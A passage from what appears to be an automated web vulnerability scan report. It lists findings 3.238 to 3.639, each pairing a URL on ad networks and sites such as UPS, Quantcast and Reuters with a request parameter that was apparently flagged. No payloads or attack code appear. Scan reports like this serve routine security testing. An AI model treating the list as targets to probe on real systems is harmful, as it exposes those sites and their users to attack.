3.238. http://event.adxpose.com/event.flow [uid parameter]

3.239. http://ib.adnxs.com/ab [cnd parameter]

3.240. http://ib.adnxs.com/ab [custom_macro parameter]

3.241. http://ib.adnxs.com/ptj [redir parameter]

3.242. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

3.243. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

3.244. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

3.245. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

3.246. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

3.247. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

3.248. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

3.249. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

3.250. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

3.251. http://js.revsci.net/gateway/gw.js [csid parameter]

3.252. http://js.uk.reuters.com/recommend/re/re [callback parameter]

3.253. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

3.254. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

3.255. http://kona5.kontera.com/KonaGet.js [l parameter]

3.256. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.257. http://mads.cbsnews.com/mac-ad [&adfile parameter]

3.258. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

3.259. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

3.260. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.261. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.262. http://mads.cbsnews.com/mac-ad [CELT parameter]

3.263. http://mads.cbsnews.com/mac-ad [CID parameter]

3.264. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.265. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.266. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.267. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.268. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.269. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.270. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.271. http://mads.cbsnews.com/mac-ad [POS parameter]

3.272. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.273. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.274. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.275. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.276. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.277. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.278. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

3.279. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

3.280. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

3.281. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

3.282. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

3.283. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

3.284. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

3.285. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

3.286. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

3.287. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

3.288. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

3.289. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

3.290. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

3.291. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

3.292. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

3.293. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

3.294. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

3.295. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

3.296. http://odb.outbrain.com/utils/get [callback parameter]

3.297. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

3.298. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

3.299. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

3.300. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

3.301. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

3.302. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

3.303. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

3.304. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

3.305. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

3.306. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

3.307. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

3.308. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

3.309. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.310. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

3.311. http://r.turn.com/server/pixel.htm [fpid parameter]

3.312. http://r.turn.com/server/pixel.htm [sp parameter]

3.313. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 1]

3.314. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 2]

3.315. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]

3.316. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [name of an arbitrarily supplied request parameter]

3.317. http://scripts.desmoinesregister.com/prototype.js [REST URL parameter 1]

3.318. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

3.319. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

3.320. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

3.321. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

3.322. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

3.323. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

3.324. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

3.325. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.326. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.327. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.328. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.329. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.330. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.331. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.332. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.333. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.334. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

3.335. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

3.336. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

3.337. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

3.338. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

3.339. http://uk.reuters.com/assets/commentsChild [articleId parameter]

3.340. http://uk.reuters.com/assets/commentsChild [channel parameter]

3.341. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

3.342. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

3.343. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

3.344. http://uk.reuters.com/tracker/guid [cb parameter]

3.345. http://web.adblade.com/imps.php [description_color parameter]

3.346. http://web.adblade.com/imps.php [img_pad parameter]

3.347. http://web.adblade.com/imps.php [title_color parameter]

3.348. http://widgets.digg.com/buttons/count [url parameter]

3.349. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

3.350. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

3.351. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

3.352. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

3.353. http://www.quantcast.com/about [REST URL parameter 1]

3.354. http://www.quantcast.com/about [REST URL parameter 1]

3.355. http://www.quantcast.com/about/careers [REST URL parameter 1]

3.356. http://www.quantcast.com/about/enewsletter-sign-up [REST URL parameter 1]

3.357. http://www.quantcast.com/about/enewsletter-sign-up [REST URL parameter 1]

3.358. http://www.quantcast.com/about/investors [REST URL parameter 1]

3.359. http://www.quantcast.com/about/management-team [REST URL parameter 1]

3.360. http://www.quantcast.com/about/overview [REST URL parameter 1]

3.361. http://www.quantcast.com/about/press [REST URL parameter 1]

3.362. http://www.quantcast.com/api/suggest [REST URL parameter 1]

3.363. http://www.quantcast.com/audience [REST URL parameter 1]

3.364. http://www.quantcast.com/audience [REST URL parameter 1]

3.365. http://www.quantcast.com/audience/participants [REST URL parameter 1]

3.366. http://www.quantcast.com/audience/quantcast-lookalikes [REST URL parameter 1]

3.367. http://www.quantcast.com/audience/reach-audience-for-marketers [REST URL parameter 1]

3.368. http://www.quantcast.com/audience/reach-audience-for-marketers [REST URL parameter 1]

3.369. http://www.quantcast.com/audience/reach-audience-for-media-sellers [REST URL parameter 1]

3.370. http://www.quantcast.com/audience/reach-audience-for-media-sellers [REST URL parameter 1]

3.371. http://www.quantcast.com/audience/showcase-your-audience-segments [REST URL parameter 1]

3.372. http://www.quantcast.com/audience/showcase-your-audience-segments [REST URL parameter 1]

3.373. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

3.374. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

3.375. http://www.quantcast.com/careers [REST URL parameter 1]

3.376. http://www.quantcast.com/careers [REST URL parameter 1]

3.377. http://www.quantcast.com/contact [REST URL parameter 1]

3.378. http://www.quantcast.com/contact [REST URL parameter 1]

3.379. http://www.quantcast.com/evite.com [REST URL parameter 1]

3.380. http://www.quantcast.com/evite.com [REST URL parameter 1]

3.381. http://www.quantcast.com/feed/ [REST URL parameter 1]

3.382. http://www.quantcast.com/feed/ [REST URL parameter 1]

3.383. http://www.quantcast.com/gawker.com [REST URL parameter 1]

3.384. http://www.quantcast.com/gawker.com [REST URL parameter 1]

3.385. http://www.quantcast.com/global/data-updates [REST URL parameter 1]

3.386. http://www.quantcast.com/global/data-updates [REST URL parameter 2]

3.387. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

3.388. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

3.389. http://www.quantcast.com/global/personalHeader [REST URL parameter 2]

3.390. http://www.quantcast.com/how-we-do-it [REST URL parameter 1]

3.391. http://www.quantcast.com/how-we-do-it [REST URL parameter 1]

3.392. http://www.quantcast.com/how-we-do-it/consumer-choice [REST URL parameter 1]

3.393. http://www.quantcast.com/how-we-do-it/consumer-choice/opt-out [REST URL parameter 1]

3.394. http://www.quantcast.com/how-we-do-it/consumer-choice/privacy-policy [REST URL parameter 1]

3.395. http://www.quantcast.com/how-we-do-it/data-citation-policy [REST URL parameter 1]

3.396. http://www.quantcast.com/how-we-do-it/mrc-accredited-traffic-measurement [REST URL parameter 1]

3.397. http://www.quantcast.com/how-we-do-it/privacy-policy [REST URL parameter 1]

3.398. http://www.quantcast.com/hulu.com [REST URL parameter 1]

3.399. http://www.quantcast.com/hulu.com [REST URL parameter 1]

3.400. http://www.quantcast.com/inside-quantcast [REST URL parameter 1]

3.401. http://www.quantcast.com/inside-quantcast [REST URL parameter 1]

3.402. http://www.quantcast.com/inside-quantcast/ [REST URL parameter 1]

3.403. http://www.quantcast.com/inside-quantcast/ [REST URL parameter 1]

3.404. http://www.quantcast.com/learning-center [REST URL parameter 1]

3.405. http://www.quantcast.com/learning-center [REST URL parameter 1]

3.406. http://www.quantcast.com/learning-center/ [REST URL parameter 1]

3.407. http://www.quantcast.com/learning-center/ [REST URL parameter 1]

3.408. http://www.quantcast.com/learning-center/case-studies [REST URL parameter 1]

3.409. http://www.quantcast.com/learning-center/faqs [REST URL parameter 1]

3.410. http://www.quantcast.com/learning-center/glossary [REST URL parameter 1]

3.411. http://www.quantcast.com/learning-center/guides [REST URL parameter 1]

3.412. http://www.quantcast.com/learning-center/guides/flash-measurement [REST URL parameter 1]

3.413. http://www.quantcast.com/learning-center/guides/how-to-read-our-reports [REST URL parameter 1]

3.414. http://www.quantcast.com/learning-center/quantcast-terms [REST URL parameter 1]

3.415. http://www.quantcast.com/learning-center/videos [REST URL parameter 1]

3.416. http://www.quantcast.com/measurement [REST URL parameter 1]

3.417. http://www.quantcast.com/measurement [REST URL parameter 1]

3.418. http://www.quantcast.com/measurement/integrations [REST URL parameter 1]

3.419. http://www.quantcast.com/measurement/planner-overview [REST URL parameter 1]

3.420. http://www.quantcast.com/measurement/planner-overview [REST URL parameter 1]

3.421. http://www.quantcast.com/measurement/quantified-publishers [REST URL parameter 1]

3.422. http://www.quantcast.com/measurement/television [REST URL parameter 1]

3.423. http://www.quantcast.com/opt-out [REST URL parameter 1]

3.424. http://www.quantcast.com/opt-out [REST URL parameter 1]

3.425. http://www.quantcast.com/planner [REST URL parameter 1]

3.426. http://www.quantcast.com/planner [REST URL parameter 1]

3.427. http://www.quantcast.com/privacy [REST URL parameter 1]

3.428. http://www.quantcast.com/privacy [REST URL parameter 1]

3.429. http://www.quantcast.com/profile-index [REST URL parameter 1]

3.430. http://www.quantcast.com/profile-index [REST URL parameter 1]

3.431. http://www.quantcast.com/profile/performance [REST URL parameter 1]

3.432. http://www.quantcast.com/profile/performance [REST URL parameter 2]

3.433. http://www.quantcast.com/search [REST URL parameter 1]

3.434. http://www.quantcast.com/search [REST URL parameter 1]

3.435. http://www.quantcast.com/sitemap-page [REST URL parameter 1]

3.436. http://www.quantcast.com/sitemap-page [REST URL parameter 1]

3.437. http://www.quantcast.com/terms [REST URL parameter 1]

3.438. http://www.quantcast.com/terms [REST URL parameter 1]

3.439. http://www.quantcast.com/time.com [REST URL parameter 1]

3.440. http://www.quantcast.com/time.com [REST URL parameter 1]

3.441. http://www.quantcast.com/top-sites [REST URL parameter 1]

3.442. http://www.quantcast.com/top-sites [REST URL parameter 1]

3.443. http://www.quantcast.com/top-sites-1 [REST URL parameter 1]

3.444. http://www.quantcast.com/top-sites-1 [REST URL parameter 1]

3.445. http://www.quantcast.com/top-sites/AF [REST URL parameter 1]

3.446. http://www.quantcast.com/top-sites/AI [REST URL parameter 1]

3.447. http://www.quantcast.com/top-sites/AL [REST URL parameter 1]

3.448. http://www.quantcast.com/top-sites/AQ [REST URL parameter 1]

3.449. http://www.quantcast.com/top-sites/AS [REST URL parameter 1]

3.450. http://www.quantcast.com/top-sites/AS [REST URL parameter 2]

3.451. http://www.quantcast.com/top-sites/AX [REST URL parameter 1]

3.452. http://www.quantcast.com/trademarks [REST URL parameter 1]

3.453. http://www.quantcast.com/trademarks [REST URL parameter 1]

3.454. http://www.quantcast.com/user/favorites [REST URL parameter 1]

3.455. http://www.quantcast.com/user/favorites [REST URL parameter 2]

3.456. http://www.quantcast.com/user/login [REST URL parameter 1]

3.457. http://www.quantcast.com/user/login [REST URL parameter 2]

3.458. http://www.quantcast.com/user/signup [REST URL parameter 1]

3.459. http://www.quantcast.com/user/signup [REST URL parameter 2]

3.460. http://www.quantcast.com/wisegeek.com [REST URL parameter 1]

3.461. http://www.quantcast.com/wisegeek.com [REST URL parameter 1]

3.462. http://www.quantcast.com/wpapi/menus [REST URL parameter 1]

3.463. http://www.ups.com/bussol [WT.svl parameter]

3.464. http://www.ups.com/bussol [actionID parameter]

3.465. http://www.ups.com/bussol [actionID parameter]

3.466. http://www.ups.com/bussol [contentID parameter]

3.467. http://www.ups.com/bussol [contentID parameter]

3.468. http://www.ups.com/bussol [loc parameter]

3.469. http://www.ups.com/bussol [loc parameter]

3.470. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

3.471. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

3.472. http://www.ups.com/bussol [viewID parameter]

3.473. http://www.ups.com/bussol [viewID parameter]

3.474. http://www.ups.com/bussol/ [WT.svl parameter]

3.475. http://www.ups.com/bussol/ [loc parameter]

3.476. http://www.ups.com/bussol/ [loc parameter]

3.477. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

3.478. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

3.479. http://www.ups.com/bussol/ [viewID parameter]

3.480. http://www.ups.com/bussol/ [viewID parameter]

3.481. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

3.482. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

3.483. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

3.484. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

3.485. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

3.486. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

3.487. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

3.488. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

3.489. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

3.490. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

3.491. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

3.492. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

3.493. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

3.494. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

3.495. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

3.496. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

3.497. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

3.498. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

3.499. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

3.500. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

3.501. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

3.502. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

3.503. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

3.504. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

3.505. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

3.506. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

3.507. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

3.508. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

3.509. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

3.510. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

3.511. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

3.512. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

3.513. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

3.514. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

3.515. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

3.516. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

3.517. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

3.518. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

3.519. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

3.520. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

3.521. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

3.522. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

3.523. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

3.524. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

3.525. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

3.526. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

3.527. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

3.528. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

3.529. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

3.530. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

3.531. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

3.532. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

3.533. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

3.534. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

3.535. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

3.536. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

3.537. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

3.538. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

3.539. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

3.540. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

3.541. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

3.542. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

3.543. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

3.544. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

3.545. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

3.546. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

3.547. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

3.548. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

3.549. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

3.550. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

3.551. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

3.552. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

3.553. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

3.554. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

3.555. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

3.556. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

3.557. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

3.558. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

3.559. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

3.560. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

3.561. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

3.562. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

3.563. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

3.564. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

3.565. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

3.566. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

3.567. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

3.568. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

3.569. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

3.570. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

3.571. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

3.572. http://www.ups.com/dropoff [WT.svl parameter]

3.573. http://www.ups.com/dropoff [loc parameter]

3.574. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

3.575. https://www.ups.com/account/am/start [REST URL parameter 2]

3.576. https://www.ups.com/account/am/start [REST URL parameter 2]

3.577. https://www.ups.com/account/am/start [REST URL parameter 2]

3.578. https://www.ups.com/account/am/start [REST URL parameter 3]

3.579. https://www.ups.com/account/am/start [REST URL parameter 3]

3.580. https://www.ups.com/account/am/start [REST URL parameter 3]

3.581. https://www.ups.com/account/am/start [loc parameter]

3.582. https://www.ups.com/account/am/start [loc parameter]

3.583. https://www.ups.com/account/am/start [loc parameter]

3.584. https://www.ups.com/account/us/start [REST URL parameter 2]

3.585. https://www.ups.com/account/us/start [REST URL parameter 2]

3.586. https://www.ups.com/account/us/start [REST URL parameter 2]

3.587. https://www.ups.com/account/us/start [REST URL parameter 3]

3.588. https://www.ups.com/account/us/start [REST URL parameter 3]

3.589. https://www.ups.com/account/us/start [REST URL parameter 3]

3.590. https://www.ups.com/account/us/start [loc parameter]

3.591. https://www.ups.com/account/us/start [loc parameter]

3.592. https://www.ups.com/account/us/start [loc parameter]

3.593. https://www.ups.com/cva [REST URL parameter 1]

3.594. https://www.ups.com/cva [REST URL parameter 1]

3.595. https://www.ups.com/cva [REST URL parameter 1]

3.596. https://www.ups.com/cva [loc parameter]

3.597. https://www.ups.com/cva [loc parameter]

3.598. https://www.ups.com/cva [loc parameter]

3.599. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.600. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.601. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.602. https://www.ups.com/myWorkspace/home [loc parameter]

3.603. https://www.ups.com/myWorkspace/home [loc parameter]

3.604. https://www.ups.com/myWorkspace/home [loc parameter]

3.605. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.606. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.607. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.608. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.609. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.610. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.611. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.612. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.613. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.614. https://www.ups.com/myups/addresses [loc parameter]

3.615. https://www.ups.com/myups/addresses [loc parameter]

3.616. https://www.ups.com/myups/addresses [loc parameter]

3.617. https://www.ups.com/myups/forgotpassword [loc parameter]

3.618. https://www.ups.com/one-to-one/forgot [loc parameter]

3.619. https://www.ups.com/one-to-one/register [loc parameter]

3.620. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.621. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.622. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.623. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.624. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.625. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.626. https://www.ups.com/osa/orderSupplies [loc parameter]

3.627. https://www.ups.com/osa/orderSupplies [loc parameter]

3.628. https://www.ups.com/osa/orderSupplies [loc parameter]

3.629. https://www.ups.com/quantum_services/download [loc parameter]

3.630. https://www.ups.com/quantum_services/download [loc parameter]

3.631. https://www.ups.com/quantum_services/download [loc parameter]

3.632. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.633. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.634. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.635. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

3.636. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

3.637. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

3.638. https://www.ups.com/qvadmin/admin [loc parameter]

3.639. https://www.ups.com/qvadmin/admin [loc parameter]

